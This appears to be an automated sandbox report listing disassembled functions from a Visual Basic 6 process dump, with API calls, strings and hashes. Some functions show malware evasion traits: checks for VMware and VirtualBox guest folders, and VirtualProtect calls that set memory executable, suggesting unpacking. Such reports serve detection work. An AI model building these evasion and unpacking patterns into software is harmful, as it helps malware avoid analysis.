Opcode Fuzzy Hash: 45e7551037c73fb1ac2498a493f08ad9909de1b61573c468ce027248a566e993
Instruction Fuzzy Hash: CAD14FB1E0131AAEDB00EBB8DD859EFBAB9FF44650F14461AF411A7181DF789D01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D8A0 Relevance: 94.8, APIs: 46, Strings: 8, Instructions: 330COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0FA3696C,0FA88818), ref: 0FA4D916
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA3695C,00000014), ref: 0FA4D93B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA3697C,00000058), ref: 0FA4D95F
#689.MSVBVM60(?,Options,Show Tips at Startup), ref: 0FA4D993
__vbaStrMove.MSVBVM60 ref: 0FA4D9A4
__vbaI4Str.MSVBVM60(00000000), ref: 0FA4D9A7
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0FA4D9B9
__vbaFreeObj.MSVBVM60 ref: 0FA4D9C5
__vbaNew2.MSVBVM60(0FA3696C,0FA88818), ref: 0FA4D9E2
__vbaObjSetAddref.MSVBVM60(?,0FA31328), ref: 0FA4D9F5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA3695C,00000010), ref: 0FA4DA13
__vbaObjSet.MSVBVM60(?,00000000), ref: 0FA4DA2C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA369D0,000000E4), ref: 0FA4DA51
__vbaFreeObj.MSVBVM60 ref: 0FA4DA5A
#594.MSVBVM60(?), ref: 0FA4DA72
__vbaFreeVar.MSVBVM60 ref: 0FA4DA7B
__vbaNew2.MSVBVM60(0FA3696C,0FA88818), ref: 0FA4DA94
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA3695C,00000014), ref: 0FA4DAB9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA3697C,00000050), ref: 0FA4DADD
__vbaStrCat.MSVBVM60(0FA35DB8,?), ref: 0FA4DAF2
__vbaStrMove.MSVBVM60 ref: 0FA4DAF9
__vbaStrCat.MSVBVM60(TIPOFDAY.TXT,00000000), ref: 0FA4DB01
__vbaStrMove.MSVBVM60 ref: 0FA4DB08
__vbaHresultCheckObj.MSVBVM60(00000000,0FA31328,0FA36850,000006F8), ref: 0FA4DB2B
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0FA4DB4D
__vbaFreeObj.MSVBVM60 ref: 0FA4DB59
__vbaObjSet.MSVBVM60(?,00000000), ref: 0FA4DB78
__vbaStrCat.MSVBVM60(TIPOFDAY.TXT,Die Datei ), ref: 0FA4DB8D
__vbaStrMove.MSVBVM60 ref: 0FA4DB94
__vbaStrCat.MSVBVM60( wurde nicht gefunden? ,00000000), ref: 0FA4DB9C
__vbaStrMove.MSVBVM60 ref: 0FA4DBA3
__vbaStrCat.MSVBVM60(0FA36A34,00000000), ref: 0FA4DBAB
__vbaStrMove.MSVBVM60 ref: 0FA4DBB2
__vbaStrCat.MSVBVM60(0FA36A34,00000000), ref: 0FA4DBBA
__vbaStrMove.MSVBVM60 ref: 0FA4DBC1
__vbaStrCat.MSVBVM60(Textdatei mit dem Namen ,00000000), ref: 0FA4DBC9
__vbaStrMove.MSVBVM60 ref: 0FA4DBD0
__vbaStrCat.MSVBVM60(TIPOFDAY.TXT,00000000), ref: 0FA4DBD8
__vbaStrMove.MSVBVM60 ref: 0FA4DBDF
__vbaStrCat.MSVBVM60( unter Verwendung von NotePad mit 1 Tip pro Zeile erstellen. ,00000000), ref: 0FA4DBE7
__vbaStrMove.MSVBVM60 ref: 0FA4DBEE
__vbaStrCat.MSVBVM60(Dann im selben Verzeichnis wie die Anwendung ablegen. ,00000000), ref: 0FA4DBF6
__vbaStrMove.MSVBVM60 ref: 0FA4DBFD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA36B7C,00000054), ref: 0FA4DC16
__vbaFreeStrList.MSVBVM60(00000008,?,?,?,?,?,?,?,?), ref: 0FA4DC3E
__vbaFreeObj.MSVBVM60 ref: 0FA4DC4A

Strings

Show Tips at Startup, xrefs: 0FA4D974
Die Datei , xrefs: 0FA4DB80
Textdatei mit dem Namen , xrefs: 0FA4DBC4
wurde nicht gefunden? , xrefs: 0FA4DB97
TIPOFDAY.TXT, xrefs: 0FA4DAFC, 0FA4DB85, 0FA4DBD3
Options, xrefs: 0FA4D979
unter Verwendung von NotePad mit 1 Tip pro Zeile erstellen. , xrefs: 0FA4DBE2
Dann im selben Verzeichnis wie die Anwendung ablegen. , xrefs: 0FA4DBF1

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Move$CheckFreeHresult$ListNew2$#594#689Addref
String ID: unter Verwendung von NotePad mit 1 Tip pro Zeile erstellen. $ wurde nicht gefunden? $Dann im selben Verzeichnis wie die Anwendung ablegen. $Die Datei $Options$Show Tips at Startup$TIPOFDAY.TXT$Textdatei mit dem Namen
API String ID: 1089064309-1690764050
Opcode ID: a070e8efaddca6d1b781e58ee92a3867575a63f39b84d0cbebee74468d470776
Instruction ID: 27c3b4c739de19a257207ddbc9b2a2725ba6426a6556b6025e0b4a6f7a1c8900
Opcode Fuzzy Hash: a070e8efaddca6d1b781e58ee92a3867575a63f39b84d0cbebee74468d470776
Instruction Fuzzy Hash: DBC10C71E40209BFDB14DBA4DD49EEEBBB8FF88711B108119F505E7251DAB86906CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4BAF0 Relevance: 54.4, APIs: 28, Strings: 3, Instructions: 184COMMON

Download Yara Rule

APIs

#526.MSVBVM60(?,00000104,00057094,00056ED2,00057158), ref: 0FA4BB48
__vbaStrVarMove.MSVBVM60(?), ref: 0FA4BB52
__vbaStrMove.MSVBVM60 ref: 0FA4BB5D
__vbaFreeVar.MSVBVM60 ref: 0FA4BB66
__vbaStrCopy.MSVBVM60 ref: 0FA4BB74
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000002,00000000), ref: 0FA4BB8B

Part of subcall function 0FA4BF90: __vbaVarVargNofree.MSVBVM60(0005703E,00000000,00056ED2,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFC7
Part of subcall function 0FA4BF90: __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD2
Part of subcall function 0FA4BF90: #644.MSVBVM60(00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD9
Part of subcall function 0FA4BF90: __vbaFreeStr.MSVBVM60(?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFE5

__vbaVarMove.MSVBVM60(?), ref: 0FA4BBCE
__vbaVarMove.MSVBVM60(?), ref: 0FA4BC0C
__vbaVarMove.MSVBVM60 ref: 0FA4BC36
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4BC5E
#616.MSVBVM60(?,00000000), ref: 0FA4BC6D
__vbaStrMove.MSVBVM60 ref: 0FA4BC78
__vbaStrCopy.MSVBVM60 ref: 0FA4BC88
__vbaStrCat.MSVBVM60(\VMWare\,?), ref: 0FA4BC9D
__vbaVarMove.MSVBVM60 ref: 0FA4BCB2
__vbaFreeVar.MSVBVM60 ref: 0FA4BCB7
__vbaStrCat.MSVBVM60(\oracle\virtualbox guest additions\,?), ref: 0FA4BCC6
__vbaStrMove.MSVBVM60 ref: 0FA4BCCD
__vbaStrCopy.MSVBVM60 ref: 0FA4BCDD
__vbaFreeStr.MSVBVM60 ref: 0FA4BCEC
__vbaStrVarVal.MSVBVM60(?,?), ref: 0FA4BCF9
#644.MSVBVM60(00000000), ref: 0FA4BD06
__vbaSetSystemError.MSVBVM60(00000000), ref: 0FA4BD10
#644.MSVBVM60(?), ref: 0FA4BD1F
__vbaSetSystemError.MSVBVM60(00000000), ref: 0FA4BD29
__vbaFreeStr.MSVBVM60 ref: 0FA4BD34
__vbaFreeStr.MSVBVM60(0FA4BD75), ref: 0FA4BD6D
__vbaFreeStr.MSVBVM60 ref: 0FA4BD72

Strings

PROGRAMFILES, xrefs: 0FA4BB6C
\oracle\virtualbox guest additions\, xrefs: 0FA4BCC1
\VMWare\, xrefs: 0FA4BC98

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Move$Free$#644Copy$ErrorSystem$#526#616EraseNofreeRedimVarg
String ID: PROGRAMFILES$\VMWare\$\oracle\virtualbox guest additions\
API String ID: 3986424551-1177384238
Opcode ID: 6fc9ab785fa99867dcf5cf73b1155fe8540496de22c9350f219e7247214c2e01
Instruction ID: 77b1424ef91862fc16732dc0e1ecc076d2961e42a195a31a8825f6a3266fb814
Opcode Fuzzy Hash: 6fc9ab785fa99867dcf5cf73b1155fe8540496de22c9350f219e7247214c2e01
Instruction Fuzzy Hash: 68713B75D002189FDB14DFA8D888AEEBBB5FF48311F10855AF406A7345DB78A946CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4A1C0 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 218COMMON

Download Yara Rule

APIs

#644.MSVBVM60(?,0FA78C80), ref: 0FA4A225
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000,00000000,00000000), ref: 0FA4A23F
__vbaVarMove.MSVBVM60 ref: 0FA4A26B
__vbaVarZero.MSVBVM60 ref: 0FA4A29A
__vbaVarMove.MSVBVM60 ref: 0FA4A2C2
__vbaVarMove.MSVBVM60 ref: 0FA4A2E2
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4A30E
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0FA4A33A
__vbaAryLock.MSVBVM60(?,?), ref: 0FA4A351
#644.MSVBVM60(?), ref: 0FA4A35F
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A36B
__vbaAryLock.MSVBVM60(?,?,?,?,?,?), ref: 0FA4A399
#644.MSVBVM60(?), ref: 0FA4A3A7
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A3B3
__vbaVarVargNofree.MSVBVM60(?,?,?), ref: 0FA4A3D3
__vbaStrVarVal.MSVBVM60(?,00000000), ref: 0FA4A3DE
#644.MSVBVM60(00000000), ref: 0FA4A3E5
__vbaAryLock.MSVBVM60(?,00000000), ref: 0FA4A401
#644.MSVBVM60(?), ref: 0FA4A40F
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A417
__vbaVarMove.MSVBVM60(?,?,00000000,00000000,?), ref: 0FA4A44B
__vbaFreeStr.MSVBVM60 ref: 0FA4A450
__vbaAryDestruct.MSVBVM60(00000000,?,0FA4A499), ref: 0FA4A492

Strings

@, xrefs: 0FA4A2CC

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$#644$Move$LockUnlock$Redim$DestructEraseFreeNofreeVargZero
String ID: @
API String ID: 1191888646-2766056989
Opcode ID: 6aae474cff88a99581a1b22d4e369f8ffdc7f822557a2374d47e8fe511035e38
Instruction ID: 718ac79dd7eeffbcdb75b31203b982489df7051e1f8d16f737af6bf15dd9eebf
Opcode Fuzzy Hash: 6aae474cff88a99581a1b22d4e369f8ffdc7f822557a2374d47e8fe511035e38
Instruction Fuzzy Hash: C491F7B4D00219AFDB14DFA8D998EEEBBB9FF48310F008159F505A7245DB78A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4A560 Relevance: 37.7, APIs: 25, Instructions: 229COMMON

Download Yara Rule

APIs

#644.MSVBVM60(?), ref: 0FA4A5E1
__vbaAryLock.MSVBVM60(?), ref: 0FA4A5F3
#644.MSVBVM60(0FA32FF6), ref: 0FA4A601
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A610
__vbaRedim.MSVBVM60(00000080,00000001,0FA881FC,00000011,00000001,?,00000000,?,?,00000004), ref: 0FA4A638
__vbaAryLock.MSVBVM60(?,?), ref: 0FA4A64B
#644.MSVBVM60(0FA32FF6), ref: 0FA4A659
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A662
__vbaAryLock.MSVBVM60(?), ref: 0FA4A66E
#644.MSVBVM60(0FA32FF2), ref: 0FA4A67F
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A688
#644.MSVBVM60(?), ref: 0FA4A68E
__vbaVarMove.MSVBVM60(?,?,?,?,?,?,?), ref: 0FA4A6CF

Part of subcall function 0FA4A830: __vbaRefVarAry.MSVBVM60(?,0FA4A5D1,?), ref: 0FA4A835
Part of subcall function 0FA4A830: __vbaUbound.MSVBVM60(00000001), ref: 0FA4A840

__vbaVarTstEq.MSVBVM60(?,0FA88208), ref: 0FA4A6F5
__vbaVarCmpNe.MSVBVM60(?,00008003,0FA88208), ref: 0FA4A736
__vbaVarOr.MSVBVM60(?,0000000B,00000000), ref: 0FA4A745
__vbaBoolVarNull.MSVBVM60(00000000), ref: 0FA4A74C
__vbaFreeVar.MSVBVM60 ref: 0FA4A75B
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0FA4A781
__vbaAryLock.MSVBVM60(?,00000000), ref: 0FA4A794
#644.MSVBVM60(0FA32FF6), ref: 0FA4A7A2
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A7AB
__vbaAryLock.MSVBVM60(?,?), ref: 0FA4A7B8
#644.MSVBVM60(0FA32FF6), ref: 0FA4A7C6
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A7CE

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$#644$LockUnlock$Redim$BoolFreeMoveNullUbound
String ID:
API String ID: 1580109814-0
Opcode ID: 23c8340deab45c5e0880bc1cdb5695d683ad6134815572d60f8a453d2a897eb7
Instruction ID: 5fe8a9a73316ce771da18797f98fd70c1ac5e45e1580baf0746a463555c433f0
Opcode Fuzzy Hash: 23c8340deab45c5e0880bc1cdb5695d683ad6134815572d60f8a453d2a897eb7
Instruction Fuzzy Hash: 1791DAB5D00209AFDB14DFE4C984EEEBBB9FF88710F10861AE505A7245EB74A945CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4C960 Relevance: 31.7, APIs: 21, Instructions: 157COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60(?,00056ED2,0005720C), ref: 0FA4C9D0
__vbaVarDup.MSVBVM60 ref: 0FA4C9EF
#607.MSVBVM60(?,00000104,?), ref: 0FA4CA01
__vbaVarMove.MSVBVM60 ref: 0FA4CA16
__vbaFreeVar.MSVBVM60 ref: 0FA4CA1B
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000002,00000000), ref: 0FA4CA35

Part of subcall function 0FA4BF90: __vbaVarVargNofree.MSVBVM60(0005703E,00000000,00056ED2,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFC7
Part of subcall function 0FA4BF90: __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD2
Part of subcall function 0FA4BF90: #644.MSVBVM60(00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD9
Part of subcall function 0FA4BF90: __vbaFreeStr.MSVBVM60(?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFE5

__vbaVarMove.MSVBVM60(?), ref: 0FA4CA7B
__vbaVarMove.MSVBVM60(?), ref: 0FA4CAB8
__vbaVarMove.MSVBVM60 ref: 0FA4CAE8
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4CB16
__vbaStrVarVal.MSVBVM60(?,?,00000000), ref: 0FA4CB29
#616.MSVBVM60(00000000), ref: 0FA4CB30
__vbaVarMove.MSVBVM60 ref: 0FA4CB46
__vbaFreeStr.MSVBVM60 ref: 0FA4CB4B
__vbaVarCopy.MSVBVM60 ref: 0FA4CB70
__vbaVarCopy.MSVBVM60 ref: 0FA4CB7C
__vbaFreeStr.MSVBVM60(0FA4CBF4), ref: 0FA4CBD0
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0FA4CBD8
__vbaFreeVar.MSVBVM60 ref: 0FA4CBE7
__vbaFreeStr.MSVBVM60 ref: 0FA4CBEC
__vbaFreeVar.MSVBVM60 ref: 0FA4CBF1

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Free$Move$Copy$#607#616#644DestructEraseNofreeRedimVarg
String ID:
API String ID: 2836734116-0
Opcode ID: 89e9e9c1cfeac5bf592aafded28617e2d811daa5a0097675f822cc627eea7a18
Instruction ID: 18b88b49f998e7ff74c0390dc6998640d3efd962f69948d1a10e5efb97aeda22
Opcode Fuzzy Hash: 89e9e9c1cfeac5bf592aafded28617e2d811daa5a0097675f822cc627eea7a18
Instruction Fuzzy Hash: 3371E5B1D002289FDB24DFA8DC84BDDBBB8FF48314F008199E50AA7245DB746A49CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0FA86A30 Relevance: 30.1, APIs: 20, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000080,00000001,0FA881D0,00000011,00000001,0000003F,00000000,00057094,00056ED2,00057158), ref: 0FA86A8C
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 0FA86A9E
__vbaVarMove.MSVBVM60 ref: 0FA86AC0
__vbaErase.MSVBVM60(00000000,?), ref: 0FA86AEC
__vbaStrCat.MSVBVM60(0FA35C64,0FA35C5C,?), ref: 0FA86B09
__vbaStrMove.MSVBVM60 ref: 0FA86B16
__vbaStrCat.MSVBVM60(0FA35C84,00000000), ref: 0FA86B1E
__vbaStrMove.MSVBVM60 ref: 0FA86B25
__vbaStrCat.MSVBVM60(0FA35C8C,00000000), ref: 0FA86B2D
__vbaStrMove.MSVBVM60 ref: 0FA86B34
__vbaI4Str.MSVBVM60(00000000), ref: 0FA86B37
__vbaStrCat.MSVBVM60(0FA35C84,0FA35C7C,00000000), ref: 0FA86B48
__vbaStrMove.MSVBVM60 ref: 0FA86B4F
__vbaI4Str.MSVBVM60(00000000), ref: 0FA86B52
VirtualProtect.KERNEL32(00000000,00000000), ref: 0FA86B60
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0FA86B74
__vbaAryLock.MSVBVM60(?,?), ref: 0FA86B88
#644.MSVBVM60(0FA32FF6), ref: 0FA86B9A
__vbaAryUnlock.MSVBVM60(?), ref: 0FA86BA6
VirtualProtect.KERNEL32(00000000,00000040,?,?,00000000,00000000,00000040), ref: 0FA86BC2

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Move$ProtectRedimVirtual$#644EraseFreeListLockUnlock
String ID:
API String ID: 1098726545-0
Opcode ID: ede05a8afcc87703cc198591b1297e73a9ea5c399369e6f1b040e65a75106f84
Instruction ID: 9ad4fbb0cac03badacde59b916c6d781fcbf878115105be56cbfac081d3edea2
Opcode Fuzzy Hash: ede05a8afcc87703cc198591b1297e73a9ea5c399369e6f1b040e65a75106f84
Instruction Fuzzy Hash: 09511371E10219AFDB14DFA4DC85EEFBB79FF48711F05411AF501A7241DAB45906CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4CE80 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60(0FA32FF6,00000000,?), ref: 0FA4CED2

Part of subcall function 0FA4CDF0: __vbaVarVargNofree.MSVBVM60(0FA32FF6,00000000,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6,?), ref: 0FA4CE33
Part of subcall function 0FA4CDF0: __vbaLenVarB.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,0FA32FF6,?), ref: 0FA4CE3E
Part of subcall function 0FA4CDF0: __vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,0FA32FF6,?), ref: 0FA4CE45

__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,?,?,00000000), ref: 0FA4CEFE
__vbaAryLock.MSVBVM60(?,?), ref: 0FA4CF0F
#644.MSVBVM60(0FA32FF6), ref: 0FA4CF21
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4CF2D
__vbaStrVarVal.MSVBVM60(?,?), ref: 0FA4CF3B
#644.MSVBVM60(00000000), ref: 0FA4CF42
__vbaFreeStr.MSVBVM60(00000000,00000000,00000000,?,?), ref: 0FA4CF69
#608.MSVBVM60(?,00000000,?), ref: 0FA4CFBA
__vbaVarCat.MSVBVM60(?,?,00000008), ref: 0FA4CFCC
__vbaStrVarMove.MSVBVM60(00000000), ref: 0FA4CFD3
__vbaStrMove.MSVBVM60 ref: 0FA4CFDE
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0FA4CFEA
__vbaFreeVar.MSVBVM60(0FA4D053,?), ref: 0FA4D037
__vbaFreeObj.MSVBVM60 ref: 0FA4D040
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0FA4D04C

Strings

@, xrefs: 0FA4CF78

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Free$#644Move$#608DestructListLockNofreeRedimUnlockVarg
String ID: @
API String ID: 2913168291-2766056989
Opcode ID: 956cf180f7f1fde8c1a51fe335b0166a7ce68e18debd25d41e09a046c781be5b
Instruction ID: 5b25b35d20ee3691136a235d14eaa8d82f03f975e01411fce9e6d2c5cd78bff5
Opcode Fuzzy Hash: 956cf180f7f1fde8c1a51fe335b0166a7ce68e18debd25d41e09a046c781be5b
Instruction Fuzzy Hash: 1E5115B1D00249AFDB14DFA4D988EEEBBB8FF48711F10811AF516A7241DB746946CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA86830 Relevance: 24.1, APIs: 16, Instructions: 137COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000004,00000000,00057094,00056ED2,00057158), ref: 0FA8688A
__vbaVarMove.MSVBVM60 ref: 0FA868BA
__vbaStrCat.MSVBVM60(0FA35C64,0FA35C5C), ref: 0FA868CC
__vbaStrMove.MSVBVM60 ref: 0FA868D3
__vbaStrCat.MSVBVM60(0FA35C6C,00000000), ref: 0FA868DF
__vbaStrMove.MSVBVM60 ref: 0FA868E6
__vbaStrCat.MSVBVM60(0FA35C74,00000000), ref: 0FA868F2
#638.MSVBVM60(?), ref: 0FA86902
__vbaVarMove.MSVBVM60 ref: 0FA86933
#644.MSVBVM60(?), ref: 0FA86939
__vbaVarMove.MSVBVM60 ref: 0FA86959
__vbaVarMove.MSVBVM60 ref: 0FA86976
__vbaVarMove.MSVBVM60 ref: 0FA86996
__vbaErase.MSVBVM60(00000000,?), ref: 0FA869BC
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0FA869CC
__vbaFreeVar.MSVBVM60 ref: 0FA869D8

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
